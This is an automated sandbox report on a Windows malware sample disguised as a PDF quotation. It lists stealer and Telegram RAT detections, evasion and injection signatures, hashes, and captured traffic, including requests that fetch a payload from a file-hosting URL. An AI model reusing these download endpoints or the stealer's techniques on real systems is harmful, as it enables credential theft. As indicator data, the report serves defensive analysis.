Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_JANQUOTE312025#U00faPDF.scr

Overview

General Information

Sample name:QUOTATION_JANQUOTE312025#U00faPDF.scr
renamed because original name is a hash value
Original sample name:QUOTATION_JANQUOTE312025PDF.scr
Analysis ID:1614909
MD5:e63401dadbae9a4ebd6ce665946ea633
SHA1:9ac1d2865acfd258a07cb867a0b312b0928045dd
SHA256:95ae323853bc8dd988d2ff7c9385d63e6fb5147e409a91cddf60a121f17928a5
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2587912231.0000000006ED0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000004.00000002.3287257268.00000000032E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-14T09:21:32.648229+010028032742Potentially Bad Traffic192.168.2.549942193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrAvira: detected
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrVirustotal: Detection: 34%Perma Link
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrReversingLabs: Detection: 13%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49951 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.30.119.107:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_068806B8
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_068807AA
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_068802B4
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_068800CF
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_06880014
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_06880040
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_06880845
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_0688018C
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_06880936
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4x nop then jmp 068800EBh4_2_0688015C
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49942 -> 193.122.6.168:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49951 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: 3007.filemail.com
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3007.filemail.com
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrString found in binary or memory: http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRb
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3007.filemail.com
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yR
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 193.30.119.107:443 -> 192.168.2.5:49705 version: TLS 1.2

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_063F5D90 NtResumeThread,0_2_063F5D90
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_063F5D8A NtResumeThread,0_2_063F5D8A
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_0157E6B00_2_0157E6B0
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_0157A9580_2_0157A958
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_0157A9680_2_0157A968
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_0157AEF00_2_0157AEF0
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_0157AEE00_2_0157AEE0
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_077FF2980_2_077FF298
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_077FF5800_2_077FF580
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_077FE2980_2_077FE298
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_077FDDE00_2_077FDDE0
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_077E00400_2_077E0040
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_077E00070_2_077E0007
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_016439784_2_01643978
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_016440D84_2_016440D8
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0164F0984_2_0164F098
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0164C2884_2_0164C288
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_016440C74_2_016440C7
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_016493E94_2_016493E9
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_016493F84_2_016493F8
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0164BAE84_2_0164BAE8
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0164454F4_2_0164454F
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_01643E204_2_01643E20
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_01643E104_2_01643E10
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0688D7784_2_0688D778
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0688CA184_2_0688CA18
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_06881F994_2_06881F99
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_06881FA84_2_06881FA8
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_06889FED4_2_06889FED
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068844004_2_06884400
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068834694_2_06883469
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068843FF4_2_068843FF
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068843F04_2_068843F0
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068800144_2_06880014
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585698280.0000000006970000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBshrwx.dll" vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000000.2041839228.0000000000D43000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNlslnred.exe> vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.00000000042C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2569130721.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004289000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBshrwx.dll" vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3285263428.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3285478701.0000000000FB7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrBinary or memory string: OriginalFilenameNlslnred.exe> vs QUOTATION_JANQUOTE312025#U00faPDF.scr
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, S1Zbg2pp4rKsDwwU6hU.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, FLQdLKipqaaenTJXjB.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
